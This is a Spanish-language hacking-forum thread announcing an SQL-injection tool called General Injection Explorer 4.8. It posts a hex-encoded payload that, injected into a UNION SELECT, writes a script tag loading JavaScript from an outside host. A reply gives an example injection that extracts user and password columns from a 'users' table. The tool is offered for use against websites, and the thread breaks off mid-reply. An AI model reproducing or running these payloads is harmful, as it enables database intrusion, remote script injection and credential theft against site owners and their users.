Título: GiE 4.8 - SQLi Publicado por: Pony-Magic en 13 Diciembre 2010, 09:26 am General Injection Explorer 4.8
version anterior. (http://foro.elhacker.net/nivel_web/gie_47_mysqli-t287792.0.html)
Paste2 Codigo de fuente. (http://paste2.org/p/1137500) Archivo Gie.JS (http://kryptosecurity.com.ar/gie.js) Código: ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)) -> usar ((0xCode)) en vez de (0xCode) @name: General Injection Explorer @version: 4.8 @author: PonyMagic @date: 12/12/2010 - 2:51 @contact: PonyMagic@live.com PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b] Título: Re: GiE 4.8 - SQLi Publicado por: Darioxhcx en 13 Diciembre 2010, 17:31 pm saaaaabeeeeeeeeeeeeeeeeeeeeee
Título: Re: GiE 4.8 - SQLi Publicado por: Karcrack en 17 Diciembre 2010, 11:23 am Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código: ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)) Título: Re: GiE 4.8 - SQLi Publicado por: Pony-Magic en 17 Diciembre 2010, 12:52 pm Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto: Código: ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)) cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo. es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript. Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto: .php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4-- En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso. Título: Re: GiE 4.8 - SQLi Publicado por: xassiz~ en 17 Diciembre 2010, 14:37 pm Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto: Código: ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)) Código
|